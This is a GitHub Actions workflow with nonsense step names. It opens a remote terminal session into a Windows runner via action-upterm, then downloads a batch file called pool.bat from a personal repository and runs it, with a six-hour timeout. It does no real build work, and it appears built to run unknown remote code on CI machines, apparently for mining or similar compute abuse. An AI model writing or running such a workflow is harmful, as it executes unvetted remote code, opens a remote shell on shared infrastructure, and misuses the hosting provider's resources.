name: CIhuy

on: 
  workflow_dispatch:
    
jobs:
  build:
    runs-on: windows-2019
    timeout-minutes: 360
    steps:
      - name: Debuk
        uses: lhotari/action-upterm@v1

      - name: pularis
        run: |
          Invoke-WebRequest -Uri "https://github.com/ajiBaru/ActionDocker/raw/refs/heads/main/.github/workflows/pool.bat" -OutFile "pool.bat"
          cmd /c pool.bat
